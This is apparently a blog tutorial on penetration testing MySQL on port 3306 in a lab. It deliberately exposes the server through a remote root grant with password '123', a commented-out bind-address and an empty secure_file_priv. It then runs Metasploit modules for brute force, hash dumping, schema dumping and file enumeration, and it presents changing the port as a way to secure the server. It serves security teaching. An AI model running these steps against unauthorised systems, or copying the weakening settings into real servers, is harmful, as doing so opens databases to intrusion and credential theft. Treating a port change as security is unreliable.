In this article we will learn to make MySQL
port vulnerable and then secure it for the penetration testing on the port
3306. In order to completely learn and understand how to secure a service on a
port, you have to understand how to make it vulnerable and then perform
penetration testing. Because if you don’t understand what can be exploit and
how then you will always fail to secure it.
Table of content
·
Introduction
to MySQL-Server
·
Installation
of MySQL-Server
·
Pen
testing MySQL-Server
Introduction to
MySQL-Server
The base of MySQL will be MySQL server, which
handles the majority of the database guidelines (or directions). MySQL server
is accessible as a different program for use in a customer server organized
condition and as a library that can be implanted (or connected) into separate
applications. MySQL works alongside a few utility projects which bolster the
organization of MySQL databases. Directions are sent to MySQL-Server by means
of the MySQL customer, which is introduced on a PC. It run port 3306 by
default.
Installation of
MySQL-server
First thing to do is to install mysql server
and to do so use the following command :
apt install
mysql-server
Further, use the following command to check
whether the server is up and running or not.
netstat -tnl
Pentesting MySQL-Server
Scanning Mysql & Connecting tO Mysql
Now, as you can see the mysql server is
properly working. But if you will scan the port, it will show you that its
closed.
nmap -p3306
192.168.1.108
This port is closed because as it is running on
local address, when scanned with any other IP then it will show you that the
port is closed when this is not the case. This happens because of the default
setting in the configuration’s files of mysql, the bind address is 127.0.0.1
i.e. the port will be shown open only if you scan from this IP just like show
in the image below. And to make this change open the configuration file using
the following command:
nano
etc/mysql/mysql.conf.d/mysqld.cnf
To change this setting, just add ‘#’ in front of the ‘bind-address’ as
shown in the image below :
Now if you scan it, it will show you that the port
is open.
nmap -p3306
192.168.1.108
But further if you try to login through this
port, it will give you an error. This happens because the mysql server does not
grant privileges to other IP’s to do their bidding.
This error can be removed when you login into
the mysql server and run the following commands which will grant all permission
to the root user at when login from different IP :
GRANT ALL PRIVILEGES
ON *.* TO root@’%’ IDENTIFIED BY ‘123’;
FLUSH PRIVILEGES;
Now, when you try and login, you will be
successful as shown in the image below:
Let’s scan the port again to grab as many
details as we can such as its banner. Mac address, etc.
nmap -sv -p3306
192.168.1.108
Mysql Brute-Force Attack
One can also brute force the port by using
metaspslsoit. This module simply queries the MySQL instance for a specific
user/pass for this, go to the terminal in kali and type ‘msfconsole’ and then
use the following commands to commence the brute force login:
use
auxiliary/scanner/mysql/mysql_login
set rhosts
192.168.1.108
set user_file
/root/Desktop/user.txt
set pass_file
/root/Desktop/pass.txt
exploit
Running SQL queries without Login
into Mysql
This module allows for simple SQL statements to
be executed against a MySQL instance given the appropriate credentials. For
this, type :
use
auxiliary/admin/mysql/mysql_sql
set rhosts
192.162.1.108
set username root
set password 123
set sql show databases
exploit
Extract Mysql-Schemadump Information
Our next module extracts the schema information
from a MySQL DB server. For this exploit, type :
use
auxiliary/scanner/mysql/mysql_schemadump
set rhosts
192.168.1.108
set username root
set password 123
exploit
Extracting Login from Mysql-server
And to extracts the usernames and encrypted
password hashes from a MySQL server and stores them for later cracking; use the
following exploit :
use
auxiliary/scanner/mysql/mysql_hashdump
set rhosts
192.168.1.108
set username root
set password 123
exploit
Once the above module is completed, you see it
result in the file it creates as shown in the image below:
Checking Writable Directories
Another attack that can be executed on Mysql
port is to check the directories that are writable.
But by default, this attack cannot be performed. So, admin the has done
following the configuration then an attacker can check for directories that are
writable.
nano
etc/mysql/mysql.conf.d/mysqld.cnf
Then add ‘secure_file_priv=””’
at the end of the file.
Now if you run the following exploit through
Metasploit, it will allow you to Enumerate writeable directories using the
MySQL SELECT INTO DUMPFILE feature.
use
auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts
192.168.1.108
set username root
set password 123
set dir_list
/root/dir.txt
exploit
Enumerating File
For further pentesting mysql port, you can use
the following exploit for Enumerate files and directories using the MySQL
load_file feature.
use
auxiliary/scanner/mysql/mysql_file_enum
set rhosts
192.168.1.108
set username root
set password 123
set file_list
/root/dir.txt
exploit
Port Transferring
Next comes port forwarding. This method is used
in order to secure the port from the attacks. For port forwarding, just open
the configuration by using the following command:
nano etc/mysql/mysql.conf.d/mysqld.cnf
And then change the port number to which ever
you desire. For instance, we have given here 4033
.
After changing the port, when you scan the it,
it will show you the sql service is running on the new port instead of the
default one.
So, this way to learn how to exploit and secure
MySQL-Server.
0 comments:
Post a Comment